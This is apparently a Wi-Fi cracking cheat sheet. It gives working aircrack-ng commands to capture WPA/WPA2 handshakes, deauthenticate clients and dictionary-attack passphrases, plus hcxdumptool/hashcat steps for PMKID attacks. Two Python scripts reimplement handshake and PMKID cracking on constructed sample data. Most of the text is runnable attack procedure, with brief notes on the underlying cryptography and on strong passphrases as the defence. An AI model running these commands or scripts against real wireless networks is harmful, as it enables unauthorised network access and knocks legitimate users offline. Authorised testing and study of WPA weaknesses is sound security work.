Cracking

Check that the wireless interface (already in monitor mode, the same one used for capturing below) supports packet injection; -e and -a are the target network's ESSID and BSSID

aireplay-ng --test wlan0mon -e essid -a FF:FF:FF:FF:FF:FF

WPA/WPA2 Handshake

Capture the WPA/WPA2 4-way handshake of one network, locked to its channel and BSSID; airodump-ng writes airodump_essid_results-01.cap and shows "WPA handshake: <BSSID>" in its header once a complete handshake has been seen

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

[Optional] Deauthenticate clients so they reconnect and produce a fresh handshake; run this in a second terminal while airodump-ng is still capturing on the same channel, and add -c <client MAC> to target a single station instead of broadcasting to all of them

aireplay-ng --deauth 10 wlan0mon -e essid -a FF:FF:FF:FF:FF:FF

Run the dictionary attack against the captured handshake; -e and -b select the right network when the capture file contains more than one

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap
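What aircrack-ng does for every wordlist entry in the command above is derive the PMK from the candidate passphrase and ESSID, expand it into the PTK, and recompute the MIC of a captured EAPOL frame with the resulting KCK. The script below is an added example of that check, not part of the aircrack-ng suite. Every value that looks captured (the ESSID "ExampleNet", the MACs, the nonces and the EAPOL message 2) is constructed in the file from a known passphrase so it runs offline; in a real run those fields are read from the airodump-ng .cap file.

```python
"""Added example (not aircrack-ng code): verifying WPA2-PSK passphrase candidates
against a 4-way handshake. All 'captured' data below is constructed for the demo."""
import hashlib
import hmac

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC inside an EAPOL-Key frame


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512 over the sorted MACs and nonces; the first 16 bytes are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the whole EAPOL frame with the
    MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_candidate(passphrase, essid, ap_mac, sta_mac, anonce, snonce, frame) -> bool:
    """True when the candidate passphrase reproduces the MIC carried in the captured frame."""
    kck = derive_ptk(derive_pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def dictionary_attack(wordlist, essid, ap_mac, sta_mac, anonce, snonce, frame):
    """Return the first wordlist entry that verifies, or None. Entries outside the
    8..63 character range a WPA passphrase allows are skipped, as aircrack-ng does."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_candidate(word, essid, ap_mac, sta_mac, anonce, snonce, frame):
            return word
    return None


def build_eapol_m2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (STA -> AP, no Key Data) for the demo."""
    frame = bytearray(99)
    frame[0] = 0x01                           # 802.1X protocol version
    frame[1] = 0x03                           # packet type: EAPOL-Key
    frame[2:4] = (95).to_bytes(2, "big")      # body length (99 - 4 byte header)
    frame[4] = 0x02                           # descriptor type: RSN
    frame[5:7] = b"\x01\x0a"                  # key info: version 2, pairwise, MIC present
    frame[7:9] = b"\x00\x10"                  # key length 16 (CCMP)
    frame[9:17] = (1).to_bytes(8, "big")      # replay counter
    frame[17:49] = snonce                     # key nonce (SNonce in message 2)
    # bytes 49..80 (IV, RSC, Key ID) and 97..98 (key data length) stay zero
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


# --- constructed sample capture (assumed values, not from a real network) ---------
ESSID = b"ExampleNet"
AP_MAC = bytes.fromhex("00aabbccdd01")
STA_MAC = bytes.fromhex("00aabbccdd02")
ANONCE = bytes(range(32))                     # fixed nonces stand in for random ones
SNONCE = bytes(range(32, 64))
SAMPLE_PASSPHRASE = "correct horse battery"
EAPOL_M2 = build_eapol_m2(
    SNONCE, derive_ptk(derive_pmk(SAMPLE_PASSPHRASE, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
)
WORDLIST = ["short", "password", "letmein123", SAMPLE_PASSPHRASE, "hunter22"]

if __name__ == "__main__":
    print("recovered:", dictionary_attack(WORDLIST, ESSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2))
```

The cost of the attack sits entirely in the 4096-round PBKDF2 per candidate; everything after the PMK is a handful of HMACs, which is why aircrack-ng and hashcat spend their effort on PBKDF2 and why a long, non-dictionary passphrase is the only real defence against an attacker holding the capture.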

PMKID Attack

Recover a WPA/WPA2-PSK passphrase from the PMKID that an access point includes in the first EAPOL message of the 4-way handshake; the attacker can request that message itself, so no connected client and no deauthentication are needed. Not every access point sends a PMKID, so the capture may yield nothing for some targets

Install the required tools (hcxdumptool does the capturing, hcxtools the conversion; on Debian and Kali they are separate packages):

apt-get update && apt-get -y install hcxdumptool hcxtools

Start capturing PMKIDs from all nearby networks. The options below match the hcxdumptool 5.x / early 6.x command line; later releases write pcapng and renamed several options, so check hcxdumptool --help against the installed version

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon

Start capturing PMKIDs from a specific network only: write the target BSSID without colons to a filter file (one 12-hex-digit MAC per line) and pass it with --filtermode=2, which attacks only the listed access points

echo FF:FF:FF:FF:FF:FF | sed 's/://g' >> filter.txt

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2

Extract PMKID hashes in hashcat 16800 format from the capture file (-z; -k writes the unsalted 16801 format, which a -m 16800 run will not load). hcxpcaptool has since been replaced by hcxpcapngtool, which writes the hashcat 22000 format instead:

hcxpcaptool -z hashes.txt hcxdumptool_results.cap

Run the dictionary attack against the PMKID hashes. --force is deliberately left out: it suppresses hashcat's driver and hash-format warnings and can silently produce wrong results, so fix the warning instead. Hashcat 6.x deprecates -m 16800 in favour of -m 22000 on hcxpcapngtool output

hashcat -m 16800 -a 0 --session=cracking --status -O -o hashcat_results.txt hashes.txt rockyou.txt
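The PMKID procedure above works because the PMKID is just an HMAC, keyed with the PMK, over a fixed label and the two MAC addresses, and the access point hands it out before any client has proven knowledge of the passphrase. The script below is an added example of what hashcat -m 16800 computes per wordlist entry, together with a parser for the hash lines hcxpcaptool writes; it is not hcxtools or hashcat code. It goes slightly beyond the page by also accepting the newer 22000-format PMKID lines ("WPA*01*...") that hcxpcapngtool produces. The sample lines, network name "ExampleNet" and MAC addresses are constructed in the file from a known passphrase so it runs offline.

```python
"""Added example (not hcxtools or hashcat code): parsing PMKID hash lines and
recomputing the PMKID per candidate passphrase. Sample data is constructed."""
import hashlib
import hmac


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """IEEE 802.11: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA). The AP places
    this in the RSN IE of EAPOL message 1, before any client has authenticated."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_pmkid_line(line: str):
    """Parse PMKID*MAC_AP*MAC_STA*ESSIDhex (hashcat 16800) or
    WPA*01*PMKID*MAC_AP*MAC_STA*ESSIDhex*** (hashcat 22000 PMKID entry).
    Returns (pmkid, ap_mac, sta_mac, essid) as bytes; raises ValueError otherwise."""
    fields = line.strip().split("*")
    if fields[:2] == ["WPA", "01"]:
        fields = fields[2:6]
    if len(fields) != 4:
        raise ValueError("not a PMKID hash line: %r" % line)
    pmkid_hex, ap_hex, sta_hex, essid_hex = fields
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12 or not essid_hex or len(essid_hex) % 2:
        raise ValueError("malformed PMKID hash line: %r" % line)
    try:
        return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
                bytes.fromhex(sta_hex), bytes.fromhex(essid_hex))
    except ValueError:
        raise ValueError("non-hex field in PMKID hash line: %r" % line)


def is_valid_line(line: str) -> bool:
    """Cheap sanity check to run over hashes.txt before spending GPU time on it."""
    try:
        parse_pmkid_line(line)
        return True
    except ValueError:
        return False


def essid_of(line: str) -> str:
    """Decode the ESSID of a hash line, to see which networks a capture actually holds."""
    return parse_pmkid_line(line)[3].decode("utf-8", "replace")


def crack_pmkid(line: str, wordlist):
    """Return the wordlist entry whose PMK reproduces the captured PMKID, or None."""
    pmkid, ap_mac, sta_mac, essid = parse_pmkid_line(line)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not 8 <= len(word) <= 63:          # WPA passphrase length limits
            continue
        if hmac.compare_digest(compute_pmkid(derive_pmk(word, essid), ap_mac, sta_mac), pmkid):
            return word
    return None


def make_sample_lines(passphrase: str, essid: bytes, ap_mac: bytes, sta_mac: bytes):
    """Constructed sample: the same PMKID written in 16800 and in 22000 notation."""
    pmkid = compute_pmkid(derive_pmk(passphrase, essid), ap_mac, sta_mac).hex()
    body = "%s*%s*%s*%s" % (pmkid, ap_mac.hex(), sta_mac.hex(), essid.hex())
    return body, "WPA*01*" + body + "***"


# --- constructed sample data (assumed values, not from a real network) -------------
SAMPLE_PASSPHRASE = "correct horse battery"
LINE_16800, LINE_22000 = make_sample_lines(
    SAMPLE_PASSPHRASE, b"ExampleNet", bytes.fromhex("00aabbccdd01"), bytes.fromhex("00aabbccdd02")
)
WORDLIST = ["short", "password", "letmein123", SAMPLE_PASSPHRASE, "hunter22"]

if __name__ == "__main__":
    print(essid_of(LINE_16800), "->", crack_pmkid(LINE_16800, WORDLIST))
```

Running essid_of over every line of hashes.txt before cracking is worth the second it takes: a capture taken without the BSSID filter often contains networks outside the engagement scope, and those lines should be removed rather than cracked.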
